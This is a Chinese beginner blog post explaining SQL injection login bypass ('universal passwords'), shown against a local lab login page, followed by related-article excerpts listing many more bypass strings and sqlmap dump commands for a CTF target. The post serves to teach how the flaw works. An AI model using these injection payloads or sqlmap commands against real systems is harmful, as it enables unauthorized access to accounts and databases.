php之万能密码登陆

最新推荐文章于 2024-06-06 14:15:10 发布
最新推荐文章于 2024-06-06 14:15:10 发布
阅读量5.3k 收藏 6
点赞数 1
分类专栏: 万能密码 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57868287/article/details/118196704
版权 

'''
问题?后台登陆必须的账户和密码正确吗?
答:不一定是,看程序员写的代码如何,有没有做安全防范,程序都是人写的,人不是万能的,所以bug总会有的#嘛!
此时,万能登陆来了
'''

1.用户正确密码正确:

http://192.168.65.133/sqlserver/login.aspx
密码正确的数据库语句
    select * from Admin where name='yuan' and passWord='123'
    登录成功!

2.用户正确密码有误登陆

利用or和注释形成万能密码登陆
    1)
    用户输入:yuan' or 1=1 --
    密码输入:asfasfasdfa
        select * from Admin where name='yuan' or 1=1 --' and passWord='asfasfasdfa'
        登录成功!
    "--"代表数据库注释
    2)
    输入账号:yuan
    输入密码:1' or '1'='1
        select * from Admin where name='yuan' and passWord='1' or '1'='1'
        登录成功!

 

 

3.错误账号和错误密码登陆

    用户输入:yuandasffafsafdd' or 1=1 --
    密码输入:asdfdfafsaf
        select * from Admin where name='yuandasffafsafdd' or 1=1 --' and passWord='asdfdfafsaf'
        登录成功!
    因为or后面1=1为真所以为真可以登陆
    "'"起闭合作用
    一般是'(单引号),不过也有()括号

 

 

 

'''
更多万能密码可以参考
https://mp.weixin.qq.com/s?src=11&timestamp=1624540826&ver=3150&signature=qr4JPQgdtccidIu556kWfCr7Dwu7-3mOVyEBsLslf-syzgTfgpQn1dRB5KWjG7GJKPBsLL6cisot-l8wbzx*87SZcntSWXfJy75dr0UlqxJphFTMGA82uhnnLlq7oWbb&new=1

挺详细的
'''

uupunio
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP万能登陆密码
03-21
通过以上分析可以看出,“万能密码”是一种利用SQL注入漏洞来绕过登录验证的技术手段。尽管GPC魔术引号可以转义某些特殊字符,但在本例中,它无法完全阻止万能密码的使用。因此,开发人员应采取更安全的做法来防范...
后台登陆万能密码总结
lizhengnanhua的专栏
09-07 2万+
1.Asp/Aspx万能密码: 'or'='or''or 1=1--''or 1=1--'or'a'='a"or "a"="a"or"="a'='a ')or('a'='aor 1=1--a'or' 1=1--"or"="a'='a'or''='1 or '1'='1'=11 or '1'='1' or 1=1'OR 1=1%00"or 1=1%00'xoradmin' or 'a'='
php 万能密码,网络安全系列之十 万能密码登录网站后台
weixin_39969611的博客
03-11 851
在登录网站后台时,有一个比较古老的“万能密码”漏洞,即利用一个我们精心构造的用户名,即使不用输入密码,也可以登录后台,其原理仍属于SQL注入的范畴。假设数据库中存放用户信息的表是admin,其中存放用户名的字段是username,存放密码的字段是password,在用户验证页面中用来接收用户所输入的用户名和密码的变量也分别是username和password,当用户在用户验证页面输入用户名和密码后...
PHP登录验证流程(cookie验证码万能密码
m0_74120514的博客
06-06 872
通常,攻击者会构造一个恶意链接或表单,当用户点击或提交时,用户的浏览器会携带合法的Cookie发起请求。攻击者通过在用户登录前设置一个已知的会话ID,然后诱使用户使用这个会话ID进行登录。窃取Cookie:攻击者可以通过各种手段(如XSS攻击、会话劫持等)窃取用户的Cookie信息,包括用户的身份验证凭据。在后续请求中,客户端浏览器会发送这个cookie,服务器通过会话ID找到对应的用户信息,从而实现身份验证。如果用户已登录并具有有效的会话,这个请求将使用用户的会话信息,完成攻击者意图的操作。
管理后台登入万能密码合集
安全界的彭于晏的博客
06-24 2889
1.asp aspx万能密码 1: "or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6: "or 1=1-- 7:'or'a'='a 8: "or"="a'='a 9:'or''=' 10:'or'='or' 11: 1 or '1'='1'=1 12: 1 or '1'='1' or 1=1 13: 'OR 1=1%00 1
万能用户名(密码)原理分析
Have_a_great_day的博客
08-23 613
后端源代码在【.\phpStudy\WWW\cms\admin\login.action.php】中。通过两个例子可知,万能式子是利用后端代码与数据库交互的漏洞,并结合运算符算法,使最后的结果输出为真。将第一条代码输入到用户名,密码随机输入,后端数据库代码将会如下所示。在登录界面,随机输入用户名和密码,后端数据库代码将会如下所示。.】--- 接收前端登录框密码的位置。】--- 接收前端登录框账号的位置。(数据库)相匹配的账号与密码。运算符优先级:and>or。第二十行 --- 搜索与。
PHP代码审计入门-万能密码入门分析
身高两米不到的博客
10-23 1040
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有简单的html基础和php基础,跟随流沙前辈视频学习记录。常用手段是对于用户输入的字符串进行严格过滤,这里代码仅使用了addslashes()用于过滤,其实该函数也是存在绕过风险的,但我们的目的是学习,馒头得一口一口吃。-- 这时注释(要空格)个人已搭建好环境进行测试,这里仅演示代码,这里使用了phpstorm工具,具体下载及破解自行解决。本章开始,进入代码审计的世界。
万能密码登录
m0_75059136的博客
03-14 424
万能密码登录
php后台万能登陆密码,各类网站后台万能密码整理
weixin_34461414的博客
03-20 4994
各类网站后台万能密码整理2018-12-18adminadminadminadmin888asp aspx万能密码1:"or "a"="a2: ")or("a"="a3:or 1=1--4:"or 1=1--5:a"or" 1=1--6:"or 1=1--7:"or"a"="a8:"or"="a"="a9:"or""="10:"or"="or"11: 1 or "1"="1"=112: 1 or ...
后台登陆万能密码
请叫我菜鸟
01-14 1万+
asp aspx万能密码   1: "or "a"="a    2: ')or('a'='a    3:or 1=1--    4:'or 1=1--    5:a'or' 1=1--    6: "or 1=1--    7:'or'a'='a    8: "or"="a'='a    9:'or''='    10:'or'='or'    11: 1 or '1'=
注入总结之万能密码
06-15
### 注入总结之万能密码 #### 一、概述 SQL注入是一种常见的网络安全攻击手段,攻击者通过在应用程序中插入恶意SQL代码来控制后端数据库服务器。本文将针对三种不同的技术栈(PHP+MySQL、ASP+Access、ASP+MS SQL)...
PHP万能采集网站源码.zip
04-12
8. **安全措施**:由于涉及到登录信息,系统应有相应的安全措施,如密码哈希存储、CSRF(跨站请求伪造)防护、XSS(跨站脚本攻击)防御等,以保护用户数据和系统安全。 9. **响应式设计**:考虑到可能需要在不同...
phpweb的文件破解并修复万能密码漏洞
06-23
其中,"万能密码漏洞"通常指的是攻击者可以利用某种方式绕过系统的身份验证机制,使得任意用户都可以用一个固定的、所谓的"万能密码"登录系统。 首先,我们需要理解这个漏洞是如何产生的。通常,这可能源于以下几个...
基于原生小程序开发的万能门店小程序,服务器端为PHP+Mysql
最新发布
06-25
【作品名称】:基于原生小程序开发的万能门店小程序,服务器端为PHP+Mysql 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
php 万能密码,万能用户名和万能密码
weixin_42134554的博客
03-11 992
万能用户名any’ union select * from user – (后面有个注释符)联合查询,是查询的结果大于1,为真万能用户名防御PDO$username=$REQUEST['usernm'];$password=$_REQUEST['passwd'];$pdo=new PDO("mssql:host=127.0.0.1;dbname=users","sa","root");$sql="...
PHP万能密码
徐小西的专栏
01-20 1173
PHP安全方面的资料作了些收集和查阅,PHP注入首当其冲,一篇神秘小强的PHP万能密码写得不错,摘录:说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码PHP的后台。其实GPC魔术转换是否开启对用万能密码
网站后台万能密码/10大常用弱口令
热门推荐
OxYGC
05-08 4万+
01:"or "a"="a02:')or('a'='a03:or 1=1--04:'or 1=1--05:a'or' 1=1--06:"or 1=1--07:'or'a'='a08:"or"="a'='a09:'or''='10:'or'='or'11:1 or '1'='1'=112:1 or '1'='1' or 1=113:'OR 1=114:"or 1=115:'xor16:用户名 ' U
利用万能密码登陆网站后台原理及漏洞修复方法
chance2015的博客
12-25 2万+
万能密码这是个比较老的漏洞了,如果你的网站存在这个漏洞,结果肯定非常的悲剧。任何一个初学黑客技术的新人都能很轻松的入侵掉你的网站。因为需要入侵存在这种漏洞的网站不存在任何的技术含量,简单打个密码就行。。但如今还有很多网站管理员都没重视。。以至于让自己的服务器沦落成业内人士常说“万人骑” 要修复此漏洞首先需要了解该漏洞的原理,是什么愿意导致漏洞的产生。   下面就来解释下给大家吧! 原理是这样
PHP SQL注入漏洞 万能密码
叶子的Blog
10-19 1947
漏洞原理 以下面的PHP代码为例。 <?php include('con_database.php'); $username=isset($_POST['username'])?$_POST['username']:''; $password=isset($_POST['password'])?$_POST['password']:''; if($username=='' || $password==''){ echo "<script>alert('请输入账号和密码!')
sqlmap万能密码
08-15
根据引用和引用中提到的方法,你可以使用sqlmap进行post注入攻击来获取数据库信息。引用中的命令 "sqlmap -u "http://192.168.87.172/index.php" --data="user='='&pass='='" --dbs" 可以用来获取数据库名。然后使用引用中的命令 "sqlmap -u "http://192.168.87.172/index.php" --data="user='='&pass='='" --D user –tables" 查找表名。最后,使用引用中的命令 "sqlmap -u "http://192.168.87.172/index.php" --data="user='='&pass='='" -D user -T flll4g -C "key" –dump" 来获取字段key的数据。这样你就可以找到flag信息了。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTF---Web---SQL注入---01---万能密码+sqlmap](https://blog.csdn.net/qq_22160557/article/details/119194712)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值